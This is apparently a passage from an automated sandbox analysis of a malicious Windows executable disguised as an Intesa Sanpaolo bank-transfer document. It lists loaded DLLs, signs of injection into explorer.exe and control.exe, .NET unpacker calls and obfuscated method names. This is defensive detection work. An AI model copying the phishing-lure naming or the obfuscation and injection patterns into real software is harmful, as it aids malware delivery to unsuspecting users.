          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: BIze.pdbSHA256 source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Binary string: BIze.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.6c10000.8.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.cs.Net Code: dNJft2ekpp System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.26e797c.6.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.cs.Net Code: dNJft2ekpp System.Reflection.Assembly.Load(byte[])
          Source: 7.2.explorer.exe.100af840.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: 0x9ED14E62 [Mon Jun 8 07:40:18 2054 UTC]
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C092C8 pushfd ; ret 0_2_06C092C9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C09AD8 push eax; retf 0_2_06C09AD9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073BB35D push FFFFFF8Bh; iretd 0_2_073BB35F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0040E33E pushfd ; retf 6_2_0040E3A2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0040E39D pushfd ; retf 6_2_0040E3A2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0040E440 push FFFFFF8Bh; ret 6_2_0040E45E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0109225F pushad ; ret 6_2_010927F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010927FA pushad ; ret 6_2_010927F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C09AD push ecx; mov dword ptr [esp], ecx6_2_010C09B6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0109283D push eax; iretd 6_2_01092858
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0109B008 push es; iretd 6_2_0109B009
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01091344 push eax; iretd 6_2_01091369
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01099939 push es; iretd 6_2_01099940
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3BC9B5 push esp; retn 0000h7_2_0C3BCAE7
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3BCB1E push esp; retn 0000h7_2_0C3BCB1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3BCB02 push esp; retn 0000h7_2_0C3BCB03
          Source: C:\Windows\explorer.exeCode function: 7_2_0C614B02 push esp; retn 0000h7_2_0C614B03
          Source: C:\Windows\explorer.exeCode function: 7_2_0C614B1E push esp; retn 0000h7_2_0C614B1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6149B5 push esp; retn 0000h7_2_0C614AE7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022486D push ecx; ret 8_2_00224880
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047809AD push ecx; mov dword ptr [esp], ecx8_2_047809B6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0253E33E pushfd ; retf 8_2_0253E3A2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0253E39D pushfd ; retf 8_2_0253E3A2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0253E440 push FFFFFF8Bh; ret 8_2_0253E45E
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254D4B5 push eax; ret 8_2_0254D508
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254D56C push eax; ret 8_2_0254D572
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254D502 push eax; ret 8_2_0254D508
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: section name: .text entropy: 7.94939514943548
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, FQ4eefKL8pRDvyPaah.csHigh entropy of concatenated method names: 'KOXjgTcx8k', 'FMvjcmQO5U', 'fqLjnrMUQ6', 'EmejWcFXOs', 'tXhjSldnli', 'm0sj0jIJSi', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, NN6GgoPWZW7GllWdhcd.csHigh entropy of concatenated method names: 'GCpAXd6hKW', 'RKWAHb7XOT', 'YMeAtZGQO7', 'EhwA7J2lBW', 'tFmAUnga3A', 'jKOABU4rYv', 'vfhADDdPBN', 'vGJATKy2w5', 'O26Au9VEvW', 'z54AVaP9vm'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, nuMIltTApwhZGENp9S.csHigh entropy of concatenated method names: 'yhEhKuVGJ6', 'Yd9h4uBYIA', 'ToString', 'd9vhG2xe0m', 'AQ4h64g8qi', 'kgshYl8ALC', 'dTVhaY4Ulo', 'hflhMXDH8Z', 'NpOh125t8b', 'mGwhwA13Iu'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, bbjpR9UOTFUkhTmjMm.csHigh entropy of concatenated method names: 'Dispose', 'PFR9EJcKcn', 'J70kci1ey6', 'sEpOOByjkG', 'ovO9PswwWd', 'XQm9z2qiUj', 'ProcessDialogKey', 'jXWk8hA3ZF', 'WE9k9yMExw', 'mcukkw8kYG'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, Tkw3MhzJhNFuRODPVZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HipAL4rUxd', 'XNaA5kGcpS', 'G9CAdH2kCh', 'kTyAhl1ja5', 'k9hAjCk5w5', 'FlpAAcZbVK', 'mo6AbW12Zp'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csHigh entropy of concatenated method names: 'qrjQJvUbCV', 'AJEQGN4Yme', 'XuGQ6pNabx', 'hHAQYHZoVk', 'GHUQaPydqc', 'mehQMMflSi', 'oOPQ1qORyi', 'FMNQwuWaiQ', 'PsOQI60yiV', 'frXQKQidU9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, gG2kq7MUE2irokerRM.csHigh entropy of concatenated method names: 'GtKjG95b6t', 'jODj60NdvR', 'AqgjYmv48K', 'HX4ja7DmX2', 'b7ujMF67qn', 'mOsj1YCGwr', 'bm1jwakH9t', 'RcmjI7Iy9v', 'nkNjKO9vaq', 'jWFj4Sl4Jg'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, vUfHMCwEUOayslgN8D.csHigh entropy of concatenated method names: 'U3Z915KpnJ', 'GbE9wO1Dc4', 'FEP9KtxWeE', 'sIZ94SYsXU', 'PV9959O3eD', 'MbB9dns85K', 'lRhDoXnlE7NXU0mut9', 'mA5BVmrX4bBa6XJk8R', 'hyS99h8osy', 'E4g9QcBDkd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, I3iamc4cGrnmlMG0AU.csHigh entropy of concatenated method names: 'nNnMJweO33', 'tKyM6udW66', 'dwJMaUuexi', 'WHJM1Q8KK6', 'xbDMwFEUyB', 'Ro2aenIqYs', 'rjwaZ1yKKv', 'M4EaxvphuG', 'SexaqDF05x', 'a67aE5GDK9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, ImbTOCPbUTsJm8KAqxb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XI9bSWiSbO', 'SMcbiYUWFQ', 'cLWbRkSOhv', 'XRUb2Lwx14', 'v6qbefPYWA', 'qsIbZeZLwQ', 'csqbxhE9ZD'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, uki9Ae12eJJgBNuklg.csHigh entropy of concatenated method names: 'v4sA9pSxde', 'vj4AQahem0', 'tmGAfjJEt5', 'gAPAG0dXsw', 'wKaA6lb49e', 'bZjAaw9Tpw', 'T0CAMPgbwT', 'LFUjxg3wq1', 'p9wjqbyEOw', 'luSjEYMruE'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yVWN9ifYkhERJOAQN3.csHigh entropy of concatenated method names: 'tu06S7Awfh', 'iCI6iZU4NH', 'JIW6RFTw7i', 'PIa62evkKZ', 'Hqy6eZ75Rx', 'wBv6ZitD9P', 'gjr6xLjSBm', 'Fpc6qnQvf4', 'cCg6EeqWrO', 'eAn6PKxBLB'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, CDAoPHZ9q3tdiP011t.csHigh entropy of concatenated method names: 'n2B1XrxRAM', 'kWF1HViKPj', 'Siy1txaY9P', 'dSC17TYrx5', 'XXt1UpwND4', 'ne31BmEae9', 'nUe1DjtfOs', 'eNK1TI7q98', 'ptm1ugBwkf', 'PYq1VaMcyd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, GLlj4952WZgTQHSi3S.csHigh entropy of concatenated method names: 'C7G5lEAfal', 'Va75r80Hb0', 'gLp5SOUOJt', 'Amy5iGMrJy', 'EOR5ceWH3G', 'yDH5nJR0sp', 'Ki15WV2HE8', 'UTA50oif78', 'KJx5NSIi3E', 'BDE5yV4HAk'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yuejDsaqCbYW8uLHlU.csHigh entropy of concatenated method names: 'jGQY7b7vKZ', 'vgwYBAajwQ', 'vcaYT538Eh', 'UpXYuJiMHa', 'k1cY5F0djS', 'yS3YdYV4oa', 'sB4YhrNhgI', 'aJfYjYXikS', 'pgWYAXBwNd', 'tNkYbxFc9M'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, FeH1cnrs2WoFWBEwpG.csHigh entropy of concatenated method names: 'KxtLTY89fP', 'wSALuc9IFD', 'er4Lgpn4QN', 'uR0LcpjTRT', 'EKyLWdDbDi', 'psIL0vsLDW', 'SQdLyvKHoC', 'zMmLoD2i78', 'D7MLlZFORE', 'FYiLFgf9um'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, ii0mTlDFpgEWRQTa4g.csHigh entropy of concatenated method names: 'dFTtu0k2f', 'CkB77ho5r', 'X2YBsyFTq', 'SvWDHfArq', 'iEFuLuOnc', 'xZKVNHjbg', 'oGj03wwjatByIhWiUq', 'a1cfKVVU6iHmLK6dUL', 'AnpjPbx8J', 'KoVbpV8wj'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, VugkCMjxUJUiqN9Ekd.csHigh entropy of concatenated method names: 'YAXhqkMMKm', 'PSEhPGr6EG', 'Etgj89w140', 'IW4j9vxxLb', 'lr8hFW6AxZ', 'vfuhrWWa5C', 'qoBhm8fu4f', 'd0ihSQIexV', 'OrehiRLE8f', 'et1hRoOd4P'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, JAb5mcifBkCyPIWWAv.csHigh entropy of concatenated method names: 'wSmaUlrVd6', 'IRRaDKKvDs', 'krXYn6QEfh', 'zGJYWTbssx', 'N22Y09ACIf', 'CwCYNy94CT', 'p55YyVXgvP', 'S4VYo3eKX8', 'H1iYsYbk1X', 'tIwYluhuay'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, D6vJMZRNi3eJN1nVKI.csHigh entropy of concatenated method names: 'M251G5sDV2', 'QkD1YtldVB', 'CvR1MFe9Ib', 'A8sMPxpcg6', 'jvqMzFrbYd', 'rg118xDIYG', 'v4t19cawbu', 'GCJ1kt8HJ6', 'PY31QGtt1X', 'y321fWPVnj'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, FQ4eefKL8pRDvyPaah.csHigh entropy of concatenated method names: 'KOXjgTcx8k', 'FMvjcmQO5U', 'fqLjnrMUQ6', 'EmejWcFXOs', 'tXhjSldnli', 'm0sj0jIJSi', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, NN6GgoPWZW7GllWdhcd.csHigh entropy of concatenated method names: 'GCpAXd6hKW', 'RKWAHb7XOT', 'YMeAtZGQO7', 'EhwA7J2lBW', 'tFmAUnga3A', 'jKOABU4rYv', 'vfhADDdPBN', 'vGJATKy2w5', 'O26Au9VEvW', 'z54AVaP9vm'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, nuMIltTApwhZGENp9S.csHigh entropy of concatenated method names: 'yhEhKuVGJ6', 'Yd9h4uBYIA', 'ToString', 'd9vhG2xe0m', 'AQ4h64g8qi', 'kgshYl8ALC', 'dTVhaY4Ulo', 'hflhMXDH8Z', 'NpOh125t8b', 'mGwhwA13Iu'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, bbjpR9UOTFUkhTmjMm.csHigh entropy of concatenated method names: 'Dispose', 'PFR9EJcKcn', 'J70kci1ey6', 'sEpOOByjkG', 'ovO9PswwWd', 'XQm9z2qiUj', 'ProcessDialogKey', 'jXWk8hA3ZF', 'WE9k9yMExw', 'mcukkw8kYG'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, Tkw3MhzJhNFuRODPVZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HipAL4rUxd', 'XNaA5kGcpS', 'G9CAdH2kCh', 'kTyAhl1ja5', 'k9hAjCk5w5', 'FlpAAcZbVK', 'mo6AbW12Zp'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csHigh entropy of concatenated method names: 'qrjQJvUbCV', 'AJEQGN4Yme', 'XuGQ6pNabx', 'hHAQYHZoVk', 'GHUQaPydqc', 'mehQMMflSi', 'oOPQ1qORyi', 'FMNQwuWaiQ', 'PsOQI60yiV', 'frXQKQidU9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, gG2kq7MUE2irokerRM.csHigh entropy of concatenated method names: 'GtKjG95b6t', 'jODj60NdvR', 'AqgjYmv48K', 'HX4ja7DmX2', 'b7ujMF67qn', 'mOsj1YCGwr', 'bm1jwakH9t', 'RcmjI7Iy9v', 'nkNjKO9vaq', 'jWFj4Sl4Jg'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, vUfHMCwEUOayslgN8D.csHigh entropy of concatenated method names: 'U3Z915KpnJ', 'GbE9wO1Dc4', 'FEP9KtxWeE', 'sIZ94SYsXU', 'PV9959O3eD', 'MbB9dns85K', 'lRhDoXnlE7NXU0mut9', 'mA5BVmrX4bBa6XJk8R', 'hyS99h8osy', 'E4g9QcBDkd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, I3iamc4cGrnmlMG0AU.csHigh entropy of concatenated method names: 'nNnMJweO33', 'tKyM6udW66', 'dwJMaUuexi', 'WHJM1Q8KK6', 'xbDMwFEUyB', 'Ro2aenIqYs', 'rjwaZ1yKKv', 'M4EaxvphuG', 'SexaqDF05x', 'a67aE5GDK9'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, ImbTOCPbUTsJm8KAqxb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XI9bSWiSbO', 'SMcbiYUWFQ', 'cLWbRkSOhv', 'XRUb2Lwx14', 'v6qbefPYWA', 'qsIbZeZLwQ', 'csqbxhE9ZD'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, uki9Ae12eJJgBNuklg.csHigh entropy of concatenated method names: 'v4sA9pSxde', 'vj4AQahem0', 'tmGAfjJEt5', 'gAPAG0dXsw', 'wKaA6lb49e', 'bZjAaw9Tpw', 'T0CAMPgbwT', 'LFUjxg3wq1', 'p9wjqbyEOw', 'luSjEYMruE'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, yVWN9ifYkhERJOAQN3.csHigh entropy of concatenated method names: 'tu06S7Awfh', 'iCI6iZU4NH', 'JIW6RFTw7i', 'PIa62evkKZ', 'Hqy6eZ75Rx', 'wBv6ZitD9P', 'gjr6xLjSBm', 'Fpc6qnQvf4', 'cCg6EeqWrO', 'eAn6PKxBLB'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, CDAoPHZ9q3tdiP011t.csHigh entropy of concatenated method names: 'n2B1XrxRAM', 'kWF1HViKPj', 'Siy1txaY9P', 'dSC17TYrx5', 'XXt1UpwND4', 'ne31BmEae9', 'nUe1DjtfOs', 'eNK1TI7q98', 'ptm1ugBwkf', 'PYq1VaMcyd'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, GLlj4952WZgTQHSi3S.csHigh entropy of concatenated method names: 'C7G5lEAfal', 'Va75r80Hb0', 'gLp5SOUOJt', 'Amy5iGMrJy', 'EOR5ceWH3G', 'yDH5nJR0sp', 'Ki15WV2HE8', 'UTA50oif78', 'KJx5NSIi3E', 'BDE5yV4HAk'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, yuejDsaqCbYW8uLHlU.csHigh entropy of concatenated method names: 'jGQY7b7vKZ', 'vgwYBAajwQ', 'vcaYT538Eh', 'UpXYuJiMHa', 'k1cY5F0djS', 'yS3YdYV4oa', 'sB4YhrNhgI', 'aJfYjYXikS', 'pgWYAXBwNd', 'tNkYbxFc9M'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, FeH1cnrs2WoFWBEwpG.csHigh entropy of concatenated method names: 'KxtLTY89fP', 'wSALuc9IFD', 'er4Lgpn4QN', 'uR0LcpjTRT', 'EKyLWdDbDi', 'psIL0vsLDW', 'SQdLyvKHoC', 'zMmLoD2i78', 'D7MLlZFORE', 'FYiLFgf9um'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, ii0mTlDFpgEWRQTa4g.csHigh entropy of concatenated method names: 'dFTtu0k2f', 'CkB77ho5r', 'X2YBsyFTq', 'SvWDHfArq', 'iEFuLuOnc', 'xZKVNHjbg', 'oGj03wwjatByIhWiUq', 'a1cfKVVU6iHmLK6dUL', 'AnpjPbx8J', 'KoVbpV8wj'
